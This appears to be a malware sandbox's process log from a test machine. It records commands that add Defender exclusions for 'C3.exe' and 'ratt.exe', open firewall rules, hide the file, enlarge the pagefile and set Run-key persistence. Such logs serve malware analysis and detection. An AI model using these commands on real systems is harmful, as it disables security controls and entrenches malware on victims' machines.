nslookup.exe nslookup myip.opendns.com. resolver1.opendns.com
2964WMIC.exe wmic ComputerSystem get Domain
3056powershell.exe Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\C3.exe"'
1484powershell.exe Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\ratt.exe"'
2232powershell.exe Powershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\C3.exe"'
24327z.exe 7z.exe x -o"C:\Users\test22\AppData\Local\Temp" -y C3.7z
2596InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
2632netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\C3.exe" enable=yes
2980netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\C3.exe" enable=yes
2104WMIC.exe wmic computersystem where name="TEST22-PC" set AutomaticManagedPagefile=False
2196WMIC.exe wmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=20000
2540attrib.exe "C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\C3.exe"
776reg.exe REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "C3" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\C3.exe" /F
1520